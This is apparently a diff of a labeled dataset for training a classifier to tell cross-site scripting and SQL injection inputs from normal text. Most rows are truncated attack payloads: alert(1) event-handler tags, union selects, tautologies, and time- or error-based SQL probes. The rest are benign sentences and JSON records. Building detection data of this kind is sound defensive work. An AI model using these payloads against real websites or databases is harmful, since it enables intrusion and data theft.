+<bgsound onpointerleave=alert(1)>XSS</bgsound>,1,XSS,3416 +"<audio onkeyup=""alert(1)"" contenteditable>test</au",1,XSS,8888 +"1%' ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ",2,SQLi,17916 +"select * from users where id = 1 or 1#""{ union sel",2,SQLi,11579 +<u id=x tabindex=1 ondeactivate=alert(1)></u><inpu,1,XSS,4505 +<li onpointerout=alert(1)>XSS</li>,1,XSS,3983 +1' ) ) and 2832 = 4165--,2,SQLi,15147 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--",2,SQLi,10777 +<param onfocusout=alert(1) tabindex=1 id=x></param,1,XSS,2165 +-1621' in boolean mode ) order by 1--,2,SQLi,13990 +"<html onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,2898 +"<style>@keyframes x{}</style><listing style=""anima",1,XSS,6630 +1 ) where 1270 = 1270 or ( select 9173 from ( sele,2,SQLi,18328 +""" and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11027 +1' ) ) as oyad where 7161 = 7161 and 6240 = ( 'qqp,2,SQLi,17828 +alter,0,normal,23110 +"As any detailed statement of the critical system, ",0,normal,26352 +1 ) ) as prxq where 4600 = 4600,2,SQLi,20700 +Update page.,0,normal,23090 +<col id=x tabindex=1 onactivate=alert(1)></col>,1,XSS,1994 +Select salad.,0,normal,24495 +<menu id=x tabindex=1 onfocusin=alert(1)></menu>,1,XSS,3198 +"{""id"":null,""name"":""transportation""}",0,normal,27389 +<video controls autoplay ontimeupdate=alert(1)><so,1,XSS,8118 +Where's your car?,0,normal,23483 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5330 "ABC<div style=""x:exp\x00ression(javascript:alert(1",1,XSS,465 -I'm thinking of where to have our picnic.,0,normal,23974 -I want to choose a restaurant for dinner.,0,normal,23701 -<dialog onpointermove=alert(1)>XSS</dialog>,1,XSS,4370 -"<s oncontextmenu=""alert(1)"">test</s>",1,XSS,7249 -))) RLIKE SLEEP(5) AND ((('1337'='1337,2,SQLi,11214 --3595'+ ( select vppx where 6018 = 6018 union all ,2,SQLi,13190 -select * from users where id = 1 + ( \. ) union se,2,SQLi,11982 -"<nextid oncontextmenu=""alert(1)"">test</nextid>",1,XSS,4238 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,16804 -"1%"" ) ) ) union all select null,null,null,null#",2,SQLi,16209 -"<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ",1,XSS,9240 -1' ) and 7290 = 8416 and ( 'ktlz' like 'ktlz,2,SQLi,14317 -"1' where 8860 = 8860 and extractvalue ( 7982,conca",2,SQLi,19942 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10649 -"1 ) and extractvalue ( 7982,concat ( 0x5c,0x717170",2,SQLi,19795 -<style>:target {color: red;}</style><summary id=x ,1,XSS,5354 --9336' or 5641 = 9488#,2,SQLi,12546 +"{""id"":null,""name"":""Psyduck""}",0,normal,27568 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,17078 +<option id=x tabindex=1 ondeactivate=alert(1)></op,1,XSS,4372 +"<style>@keyframes x{}</style><style style=""animati",1,XSS,7251 +)) RLIKE SLEEP(5) AND ((1337=1337,2,SQLi,11216 +-2241 ) where 7606 = 7606 or ( 8459 = 8459 ) *4906,2,SQLi,13192 +"select * from users where id = 1 or ""] ) "" or 1 = ",2,SQLi,11984 +"<tr ondblclick=""alert(1)"">test</tr>",1,XSS,4240 +1 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr,2,SQLi,17368 +"1 where 8948 = 8948 and row ( 6237,7469 ) > ( sele",2,SQLi,19856 +"<path d=""M0,0"" style=""marker-start:url(test4.svg#a",1,XSS,9242 +"1"" where 9973 = 9973 and 2006 = 2006",2,SQLi,14310 +"From the drop-down menu, select the field to searc",0,normal,26161 +UNION ALL SELECT SLEEP(5)--,2,SQLi,10651 +"1, ( select ( case when ( 2970 = 5830 ) then 1 els",2,SQLi,16891 +"<object draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,5356 +"1"" where 7045 = 7045",2,SQLi,12548 "{""id"":null,""name"":""Pachirisu""}",0,normal,27370 -"{""id"":null,""name"":""salt""}",0,normal,27180 -1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) |,2,SQLi,17625 +"{""id"":null,""firstName"":""Jensen"",""lastName"":""Yeo"",""",0,normal,27178 +"1"" ) as nyzd where 5305 = 5305",2,SQLi,17623 "<iframe srcdoc=""&LT;iframe&sol;srcdoc=&amp;lt;img&",1,XSS,795 -"select * from users where id = 1 or @#"" ( = 1 or 1",2,SQLi,11938 -"{""id"":null,""firstName"":""Lai Peng"",""lastName"":""Leon",0,normal,26786 -<svg><footer onload=alert(1)></footer>,1,XSS,6887 -1' ) ) as wves where 2641 = 2641 and 2388 = benchm,2,SQLi,18105 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10995 -"<keygen onmouseleave=""alert(1)"">test</keygen>",1,XSS,1878 -"-4280%"" ) ) ) union all select 7981,7981--",2,SQLi,16135 -"-9054"" ) as rgyu where 3792 = 3792 order by 1--",2,SQLi,15839 -"<button draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,6662 -"-3703"" ) ) ) union all select 3293,3293,3293,3293,",2,SQLi,14711 -Randomly select a topic.,0,normal,24296 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,19678 -"{""id"":null,""firstName"":""Elisa"",""lastName"":""Mak"",""a",0,normal,26812 -1%' ) ) ) or sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,15781 -1'|| ( select 'fraa' from dual where 9140 = 9140 a,2,SQLi,20847 -<noframes id=x tabindex=1 onfocus=alert(1)></nofra,1,XSS,3043 -The Hilton Honors Aspire Card comes with Priority ,0,normal,25431 -"&lt;SCRIPT a=\""&gt;\"" '' SRC=\""http&#58;//ha&#46;c",1,XSS,1044 -"1 ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,16615 -1%' ) and 8407 = ( select count ( * ) from generat,2,SQLi,15616 -"?baseurl=asfunction:getURL,javascript:alert(1)//"",",1,XSS,9869 -Select your championship.,0,normal,24927 -Select trace.,0,normal,24662 -"<style>@keyframes x{}</style><sup style=""animation",1,XSS,7387 -1 where 5828 = 5828 and ( 3020 = 3020 ) *6703--,2,SQLi,17558 --8639 ) or 8138 = 6252,2,SQLi,21306 -"<summary onpaste=""alert(1)"" contenteditable>test</",1,XSS,1845 -"<br onmouseenter=""alert(1)"">test</br>",1,XSS,4279 -<bdi onpointerdown=alert(1)>XSS</bdi>,1,XSS,3836 -"a"""" or 3=3--""",2,SQLi,10073 -"<html onpaste=""alert(1)"" contenteditable>test</htm",1,XSS,3461 -1'+ ( select 'ejox' where 2719 = 2719 union all se,2,SQLi,15911 --3861' ) as zmja where 4036 = 4036 or 9323 = 9323#,2,SQLi,14097 -"<hr onclick=""alert(1)"">test</hr>",1,XSS,5026 -select * from users where id = 1 union select +!<1,2,SQLi,11574 -"-8792 union all select 1246,1246,1246,1246,1246,12",2,SQLi,18055 -1' ) as najc where 5213 = 5213 procedure analyse (,2,SQLi,12926 -<button onContextMenu=javascript:alert(1)>,1,XSS,9594 -select * from users where id = '1' or $ 1 = 1 or 1,2,SQLi,11554 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7332 -"<input onmouseout=""alert(1)"">test</input>",1,XSS,5272 +select * from users where id = 1 + \+%$ or 1 = 1 -,2,SQLi,11940 +"{""id"":null,""name"":""fight light""}",0,normal,26783 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6889 +Select your conclude.,0,normal,25003 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10997 +<hr id=x tabindex=1 onactivate=alert(1)></hr>,1,XSS,1879 +"1%"" ) ) ) and 7758 = 4792 and ( ( ( ""%"" = """,2,SQLi,16127 +1 ) ) as uvep where 6016 = 6016 and 6969 = ( selec,2,SQLi,15831 +"<picture><source srcset=""validimage.png""><img onlo",1,XSS,6664 +1'|| ( select 'bsbv' from dual where 5276 = 5276 o,2,SQLi,14704 +"1"" ) as pxdq where 2236 = 2236 and 2006 = 2006",2,SQLi,18323 +"{""id"":null,""firstName"":""Loogwah"",""lastName"":""Kanla",0,normal,26965 +1' and 6537 = dbms_pipe.receive_message ( chr ( 76,2,SQLi,21894 +"Before you can select a baby corsage, to make you ",0,normal,26328 +"1%"" ) ) ) and 8635 = ( select count ( * ) from gen",2,SQLi,20488 +"<rtc onmouseenter=""alert(1)"">test</rtc>",1,XSS,3044 +"Otherwise, you need to select your gamma value bas",0,normal,25800 +"&lt;SCRIPT \""a='&gt;'\"" SRC=\""http&#58;//ha&#46;ck",1,XSS,1045 +"1"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 )",2,SQLi,21267 +"1%"" ) ) ) or 8421 = ( select count ( * ) from gene",2,SQLi,18392 +"?onend=javascript:alert(1)//"",",1,XSS,9871 +Select your sport.,0,normal,24924 +"-8256"" ) ) ) or 6872 = 6872 and ( ( ( ""lrtu"" = ""lr",2,SQLi,15456 +<frameset><frame onload=alert(1)>,1,XSS,7389 +-8023' in boolean mode ) order by 1#,2,SQLi,17556 +1%' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) |,2,SQLi,21304 +<bdo id=x tabindex=1 onactivate=alert(1)></bdo>,1,XSS,1846 +"<u onpaste=""alert(1)"" contenteditable>test</u>",1,XSS,4281 +"<embed onmouseenter=""alert(1)"">test</embed>",1,XSS,3838 +1 waitfor delay '0:0:10'--,2,SQLi,10075 +"<div onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3463 +1 ) ) as vryv where 5600 = 5600,2,SQLi,15903 +Where's the observatory?,0,normal,23576 +<img srcset=1 onerror=alert(1)>,1,XSS,5028 +"select * from users where id = 1 or "" ( @"" or 1 = ",2,SQLi,11576 +"-3975' ) or make_set ( 1943 = 3499,3499 ) and ( 'd",2,SQLi,22197 +"-3964"" ) where 3566 = 3566 order by 1--",2,SQLi,12928 +<button onCopy=javascript:alert(1)>,1,XSS,9596 +select * from users where id = 1 or \< = 1 union s,2,SQLi,11556 +<ins id=x tabindex=1 ondeactivate=alert(1)></ins><,1,XSS,7334 +"<meter draggable=""true"" ondrag=""alert(1)"">test</me",1,XSS,5274 "<META HTTP-EQUIV=""Link"" Content=""<http://xss.rocks",1,XSS,276 -1'|| ( select 'nvvm' from dual where 5567 = 5567 r,2,SQLi,18687 -<s id=x tabindex=1 ondeactivate=alert(1)></s><inpu,1,XSS,2693 -"<colgroup onmouseover=""alert(1)"">test</colgroup>",1,XSS,6323 -"<noscript draggable=""true"" ondragend=""alert(1)"">te",1,XSS,6612 -1 ) as selm where 5759 = 5759,2,SQLi,18508 -"{""id"":null,""firstName"":""Wufu"",""lastName"":""Shi"",""sp",0,normal,27590 -"<code onkeypress=""alert(1)"" contenteditable>test</",1,XSS,3076 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,15136 -"<bdo draggable=""true"" ondrag=""alert(1)"">test</bdo>",1,XSS,7900 -select ( case when ( 4341 = 7041 ) then 4341 else ,2,SQLi,16762 -Select song.,0,normal,23066 -"1"" where 8241 = 8241 union all select null,null,nu",2,SQLi,14371 -"1 ) ) ) union all select null,null,null#",2,SQLi,19581 -1 or 5286 = ( select count ( * ) from all_users t1,2,SQLi,12590 -"select * from generate_series ( 9434,9434,case whe",2,SQLi,14426 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8747 -"Up to 35% off select washing machines, ovens, and ",0,normal,25213 -<image srcset=1 onerror=alert(1)>,1,XSS,1887 -"<audio onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,8538 -"<dd onmouseenter=""alert(1)"">test</dd>",1,XSS,6830 -"1 ) where 5336 = 5336 union all select null,null,n",2,SQLi,16099 -javascript:alert();//<img src=x:x onerror=alert(1),1,XSS,9537 -Sexy nursing bras are often designer items that mu,0,normal,25558 -<template id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,4177 -"<style>@keyframes slidein {}</style><tfoot style=""",1,XSS,2237 -<style>:target {color:red;}</style><var id=x style,1,XSS,2854 -<svg><xss onload=alert(1)></xss>,1,XSS,7454 -1,0,normal,26651 -"{""id"":null,""firstName"":""Suraya"",""lastName"":""Rasid""",0,normal,27435 -"and (select substring(@@version,3,1))='S'",2,SQLi,10347 -1%' ) ) ) and 2006 = 2006,2,SQLi,13658 -"-5622"" where 7970 = 7970 union all select 7970,797",2,SQLi,13532 -How to watch it: Tully is playing in select theate,0,normal,26077 -"-9873"" union all select 8020,8020,8020,8020,8020,8",2,SQLi,15985 -select * from users where id = '1' union select \.,2,SQLi,11885 -or'1=1′,2,SQLi,9986 -"<% foo><x foo=""%><script>alert(91)</script>"">//[""'",1,XSS,9024 -"-3321"" where 1603 = 1603 union all select 1603,160",2,SQLi,19510 -join,0,normal,23114 -WHERE 1=1 AND 1=1,2,SQLi,10237 -"1' ) and elt ( 4249 = 4249,7259 ) and ( 'bxnn' = '",2,SQLi,20949 -Each year we offer a select number of summer inter,0,normal,26220 -<slot id=x tabindex=1 onfocusin=alert(1)></slot>,1,XSS,2454 -1 ) where 7199 = 7199 and 8407 = ( select count ( ,2,SQLi,12287 -"<dt draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,4315 -where,0,normal,26528 -<style>:target {color: red;}</style><figcaption id,1,XSS,8077 -<u id=x tabindex=1 onbeforedeactivate=alert(1)></u,1,XSS,8553 -"-6073"" ) ) ) or 9502 = 2012#",2,SQLi,13200 -Where did you find that peaceful park?,0,normal,23801 -Can't select that one.,0,normal,24454 -"<wbr onmousemove=""alert(1)"">test</wbr>",1,XSS,8482 -1' ) as yxdb where 4597 = 4597,2,SQLi,20607 -Where's the sledding hill?,0,normal,23611 -"<track onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,3516 -1 where 6369 = 6369 procedure analyse ( extractval,2,SQLi,16482 -"1"" ) ) ) and ( select 2* ( if ( ( select * from ( ",2,SQLi,22311 -"1"" ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ",2,SQLi,17228 -"1"" ) ) as hwlh where 1071 = 1071 union all select ",2,SQLi,13275 -"<th onmousedown=""alert(1)"">test</th>",1,XSS,8586 -select ( case when ( 7019 = 1998 ) then 7019 else ,2,SQLi,13422 +"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,",2,SQLi,18685 +"<style>@keyframes slidein {}</style><dt style=""ani",1,XSS,2694 +"<title onmouseup=""alert(1)"">test</title>",1,XSS,6325 +<acronym id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,6614 +"1"" ) ) as swix where 2459 = 2459 or 8466 = benchma",2,SQLi,18506 +1 ) as hlit where 4973 = 4973 procedure analyse ( ,2,SQLi,15258 +"<textarea onmouseout=""alert(1)"">test</textarea>",1,XSS,3077 +1' ) ) as qovd where 8865 = 8865 and ( 3020 = 3020,2,SQLi,22282 +<time id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,7902 +1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ,2,SQLi,16760 +Join yoga.,0,normal,23063 +1 ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) |,2,SQLi,14364 +"1 ) as nfgb where 2503 = 2503 and row ( 6237,7469 ",2,SQLi,20384 +"-5230"" ) or elt ( 1032 = 1032,3623 ) and ( ""aivb"" ",2,SQLi,12592 +1'|| ( select 'vsfg' where 3547 = 3547 and updatex,2,SQLi,14419 +<style>:target {color: red;}</style><main id=x sty,1,XSS,8749 +Up to 40% off select Martha Stewart Living Closet ,0,normal,25210 +<address id=x tabindex=1 onactivate=alert(1)></add,1,XSS,1888 +"<style>@keyframes x{}</style><blockquote style=""an",1,XSS,8540 +"<noframes onmousedown=""alert(1)"">test</noframes>",1,XSS,6832 +"1%"" ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ",2,SQLi,16091 +"javascript:alert(1)//\"";alert(1);<!--jaVasCript:/*",1,XSS,9539 +"1"" ) as ltbl where 6395 = 6395",2,SQLi,20580 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4179 +<spacer id=x tabindex=1 onactivate=alert(1)></spac,1,XSS,2238 +<spacer onfocusout=alert(1) tabindex=1 id=x></spac,1,XSS,2855 +"<sup onmouseup=""alert(1)"">test</sup>",1,XSS,7456 +"1%"" ) and updatexml ( 3393,concat ( 0x2e,0x7171706",2,SQLi,19962 +"1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a",2,SQLi,19625 +sleep(5)#,2,SQLi,10349 +"1"" ) where 7914 = 7914 rlike ( select * from ( sel",2,SQLi,21493 +1 ) or 5286 = ( select count ( * ) from all_users ,2,SQLi,13534 +Specify filters where needed.,0,normal,23363 +-5830' ) as fivy where 2173 = 2173 or 5903 = ( 'qq,2,SQLi,15977 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11887 +"or 1""=""1""--",2,SQLi,9988 +<%78 onxxx=1,1,XSS,9026 +"He was a select preacher at Oxford in 1895-1897, a",0,normal,26111 +drop,0,normal,23111 +WHERE 1=1 AND 1=1#,2,SQLi,10239 +1' and ( 5116 = 1602 ) *1602,2,SQLi,20947 +"1' or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,17071 +<ins onblur=alert(1) tabindex=1 id=x></ins><input ,1,XSS,2455 +-9514 ) ) as xdkw where 4975 = 4975 union all sele,2,SQLi,12289 +<bdi onpointerover=alert(1)>XSS</bdi>,1,XSS,4317 +I slowly and curiously select the doll from my inv,0,normal,26067 +<main onblur=alert(1) tabindex=1 id=x></main><inpu,1,XSS,8079 +"<marquee onmousemove=""alert(1)"">test</marquee>",1,XSS,8555 +1' ) where 2443 = 2443 and char ( 120 ) ||char ( 1,2,SQLi,13202 +"1"" ) and make_set ( 8403 = 8403,8899 ) and ( ""akha",2,SQLi,19553 +"-2951"" or 4493 = utl_inaddr.get_host_address ( chr",2,SQLi,20643 +<link onpointerup=alert(1)>XSS</link>,1,XSS,8484 +"{""id"":null,""firstName"":""Amilia"",""lastName"":""Sc"",""a",0,normal,27444 +"1%"" ) ) union all select null,null,null,null,null#",2,SQLi,16230 +"<dialog oncontextmenu=""alert(1)"">test</dialog>",1,XSS,3518 +"1"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694",2,SQLi,16480 +1 ) ) as mcyh where 1001 = 1001,2,SQLi,17830 +1' ) and ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,15240 +1 ) ) as aeat where 1007 = 1007 and 5556 = ( selec,2,SQLi,13277 +"<summary onbeforecut=""alert(1)"" contenteditable>te",1,XSS,8588 +"1"" and make_set ( 6520 = 9958,9958 )",2,SQLi,13424 "<body onhashchange=""print()"">",1,XSS,21 -1%' and 2006 = 2006,2,SQLi,18315 -"1"" ) where 6897 = 6897",2,SQLi,12326 -1' ) ) ) or 8421 = ( select count ( * ) from gener,2,SQLi,15673 -"Select ""Make this my home Xbox"" and press A again.",0,normal,25677 -Select the optimal temperature for comfort.,0,normal,24042 -<em onpointerover=alert(1)>XSS</em>,1,XSS,5387 --1879%' ) ) or 3038 = 3038,2,SQLi,19575 -"elt ( 5953 = 5953,1 )",2,SQLi,12753 -1' ) rlike ( select ( case when ( 2671 = 4485 ) th,2,SQLi,21670 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,21518 -<img onpointerdown=alert(1)>XSS</img>,1,XSS,7724 -(sleep(5)),2,SQLi,11347 -"<iframe onmouseenter=""alert(1)"">test</iframe>",1,XSS,1873 -Select view.,0,normal,24609 -1' ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113,2,SQLi,17705 -"<style>@keyframes x{}</style><hgroup style=""animat",1,XSS,5279 -1' ) and 3560 = 5467--,2,SQLi,12883 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,20134 -Update the software on your device regularly.,0,normal,22942 -<img2 onpointerenter=alert(1)>XSS</img2>,1,XSS,5134 -<dt id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,3056 -")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND",2,SQLi,11301 -"-3460%"" ) ) ) or 9323 = 9323#",2,SQLi,13727 +"-3037"" ) ) ) or elt ( 4758 = 9129,9129 ) and ( ( (",2,SQLi,16404 +"1' where 5702 = 5702 and elt ( 3114 = 3114,sleep (",2,SQLi,12328 +1' ) ) as gchn where 5856 = 5856,2,SQLi,15665 +"Select ""New Game,"" then ""Knee Deep in the Dead"" an",0,normal,25674 +"Open the left navigation panel, select Settings, t",0,normal,25811 +<strike id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,5389 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,19573 +-3431%' ) or 9323 = 9323#,2,SQLi,12755 +select,0,normal,26595 +-1127 or 7391 = 4954,2,SQLi,21516 +"<caption onmousemove=""alert(1)"">test</caption>",1,XSS,7726 +;sleep 5,2,SQLi,11349 +"<listing onkeydown=""alert(1)"" contenteditable>test",1,XSS,1874 +1%' rlike ( select * from ( select ( sleep ( 5 ) ),2,SQLi,14531 +1%' ) ) or 1022 = ( select count ( * ) from all_us,2,SQLi,19210 +<big id=x tabindex=1 ondeactivate=alert(1)></big><,1,XSS,5281 +"-6632 ) union all select 4073,4073,4073,4073,4073,",2,SQLi,12885 +1' ) or 7552 = ( select count ( * ) from rdb$field,2,SQLi,20132 +"1"" ) where 2180 = 2180 and make_set ( 8403 = 8403,",2,SQLi,15246 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5136 +"<audio draggable=""true"" ondrag=""alert(1)"">test</au",1,XSS,3057 +"AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND 13",2,SQLi,11303 +select ( case when ( 1123 = 9550 ) then 1123 else ,2,SQLi,13720 <///style///><span %2F onmousemove='alert&lpar;1&r,1,XSS,864 -Where's the mosque?,0,normal,23530 -"The House Select Committee on Benghazi, chaired by",0,normal,25429 +"-5934' union all select 6096,6096,6096,6096,6096#",2,SQLi,17507 +The Industrial Select Sector SPDR Fund ETF is up 5,0,normal,25426 "/*iframe/src*/<iframe/src=""<iframe/src=@""/onload=p",1,XSS,872 -%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%,1,XSS,9405 -"<XSS STYLE=""xss:expression(document.vulnerable=tru",1,XSS,1509 -Insert the memory card.,0,normal,22630 -1 ) ) as cwyb where 3633 = 3633,2,SQLi,15491 -1'|| ( select 'ezse' from dual where 3821 = 3821,2,SQLi,15659 -1 ) where 9446 = 9446 union all select null#,2,SQLi,21459 -<s id=x tabindex=1 onfocusin=alert(1)></s>,1,XSS,6158 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,15944 -"-5181"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( (",2,SQLi,21879 -"1 ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 1",2,SQLi,13910 -"<q draggable=""true"" ondragleave=""alert(1)"">test</q",1,XSS,4125 -Where's the cinema?,0,normal,23541 -"{""id"":null,""name"":""mission hall stove""}",0,normal,27112 -<style>:target {color: red;}</style><meter id=x st,1,XSS,7825 -1' ) and ( 3020 = 3020 ) *6703 and ( 'lhfa' = 'lhf,2,SQLi,21876 -<video onpointerout=alert(1)>XSS</video>,1,XSS,2467 -<figcaption onfocusout=alert(1) tabindex=1 id=x></,1,XSS,4217 -"1"" ) or 8315 = ( select count ( * ) from sysibm.sy",2,SQLi,19495 -"<video draggable=""true"" ondrag=""alert(1)"">test</vi",1,XSS,8878 -"<A HREF=""http://google:ha.ckers.org""></A>",1,XSS,7104 -"<bdi onmouseenter=""alert(1)"">test</bdi>",1,XSS,5376 -Join the art class.,0,normal,22720 -"<meta onkeyup=""alert(1)"" contenteditable>test</met",1,XSS,5614 -)) waitfor delay '0:0:20' /*,2,SQLi,10927 -"1"" ) ) order by 1#",2,SQLi,19660 -<sub onpointermove=alert(1)>XSS</sub>,1,XSS,8867 -"<ScRipT>alert(""XSS"");</ScRipT>",1,XSS,1712 -Update your status message.,0,normal,22703 -1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,17802 +%3Cscript%3Ealert(1)%3C/script%3E##1,1,XSS,9407 +"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//",1,XSS,1510 +Where's the missing piece?,0,normal,22627 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,15483 +"1' where 7125 = 7125 or elt ( 6272 = 6272,sleep ( ",2,SQLi,15651 +1' ) ) and ( 1427 = 5813 ) *5813 and ( ( 'estb' li,2,SQLi,20244 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6160 +"1' ) where 6731 = 6731 or elt ( 5873 = 5873,sleep ",2,SQLi,15936 +If you want your Xbox One to display everything in,0,normal,26040 +1' ) ) as txxn where 7884 = 7884 and 3715 in ( ( c,2,SQLi,21009 +<style>:target {color: red;}</style><canvas id=x s,1,XSS,4127 +Select your dream engagement ring.,0,normal,24364 +Select your question.,0,normal,24968 +"<nobr ondblclick=""alert(1)"">test</nobr>",1,XSS,7827 +1 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6,2,SQLi,14713 +"<form oncontextmenu=""alert(1)"">test</form>",1,XSS,2468 +<frame onpointermove=alert(1)>XSS</frame>,1,XSS,4219 +"-1434' ) ) union all select 4734,4734,4734,4734,47",2,SQLi,19493 +"<isindex onmouseout=""alert(1)"">test</isindex>",1,XSS,8880 +<canvas onpointerleave=alert(1)>XSS</canvas>,1,XSS,7106 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5378 +Delete the outdated posts.,0,normal,22717 +"<style>@keyframes x{}</style><picture style=""anima",1,XSS,5616 +))) waitfor delay '0:0:20' /*,2,SQLi,10929 +"-3151%"" ) ) ) union all select 6250,6250,6250,6250",2,SQLi,18311 +<article id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,8869 +<script>alert(123)</script>,1,XSS,1713 +"1%"" ) and 7533 = 7533 and ( ""%"" = """,2,SQLi,14659 +1' where 6583 = 6583,2,SQLi,17569 <svg><script onlypossibleinopera:-)> alert(1),1,XSS,913 -"1%' ) union all select null,null,null,null,null,nu",2,SQLi,13223 -<base onblur=alert(1) tabindex=1 id=x></base><inpu,1,XSS,4790 -Get 30% off select Pet products with promo code WI,0,normal,26148 -Select your win.,0,normal,24929 -"<base oncut=""alert(1)"" contenteditable>test</base>",1,XSS,2900 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4036 -"1"" ) ) ) rlike ( select ( case when ( 7689 = 7689 ",2,SQLi,21979 -"-6523"" or 4144 = ( select upper ( xmltype ( chr ( ",2,SQLi,13183 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2847 -select sleep ( 5 ) and ( ( 3404 = 3404,2,SQLi,14325 -"<plaintext draggable=""true"" ondragenter=""alert(1)""",1,XSS,4258 -select action for Chris.,0,normal,25652 -"-4462%"" ) or 8571 = 8571--",2,SQLi,16759 -He'll select the dessert.,0,normal,24462 --2348 ) as sige where 1639 = 1639 or 3440 = cast (,2,SQLi,21638 -1' ) ) as xqam where 6750 = 6750,2,SQLi,19832 -<script /**/>/**/alert(1)/**/</script /**/,1,XSS,1255 -"1%"" ) and sleep ( 5 ) #",2,SQLi,21155 -Merge the two lists.,0,normal,22552 -"-2605%' ) ) ) union all select 4738,4738#",2,SQLi,16669 -substring,0,normal,23193 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11978 -"<ruby oncopy=""alert(1)"" contenteditable>test</ruby",1,XSS,2123 -<discard onpointermove=alert(1)>XSS</discard>,1,XSS,2674 -"1"" ) ) as wooq where 7671 = 7671 and row ( 6237,74",2,SQLi,22182 -"-1684"" ) ) ) union all select 7473,7473#",2,SQLi,13230 -"1"" ) ) as swix where 2459 = 2459 or 8466 = benchma",2,SQLi,18506 -"<image draggable=""true"" ondrag=""alert(1)"">test</im",1,XSS,6119 -Where's the salon?,0,normal,23614 -";alert(String.fromCharCode(88,83,83))//';alert(Str",1,XSS,9709 -"Select quickly, please.",0,normal,24456 -"<u onmousedown=""alert(1)"">test</u>",1,XSS,3612 -"1%"" ) and exp ( ~ ( select * from ( select concat ",2,SQLi,18336 --6755 ) or 9323 = 9323#,2,SQLi,14455 -1' ) ) ) ( select ( case when ( 5451 = 5451 ) then,2,SQLi,16739 -1' ) or 7417 = ( select count ( * ) from sysibm.sy,2,SQLi,16506 -"<output onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,7067 +"-4535' ) union all select 8491,8491,8491,8491,8491",2,SQLi,13225 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4792 +1'+ ( select 'eoxk' where 6621 = 6621 union all se,2,SQLi,16536 +"1%"" ) union all select null,null,null,null,null--",2,SQLi,16919 +<menuitem id=x tabindex=1 onbeforedeactivate=alert,1,XSS,2901 +"<track onbeforecut=""alert(1)"" contenteditable>test",1,XSS,4038 +-2456' ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( 'b,2,SQLi,21977 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,13185 +<multicol id=x tabindex=1 onbeforedeactivate=alert,1,XSS,2848 +-8472' ) where 3340 = 3340 or make_set ( 1752 = 99,2,SQLi,14318 +"<header draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,4260 +"1%"" ) and 8715 = 5529",2,SQLi,14282 +Save $50 on select Fitbit trackers on Amazon See D,0,normal,25730 +Everyone can select.,0,normal,24459 +"{""id"":null,""name"":""GardevoirMega Gardevoir""}",0,normal,27367 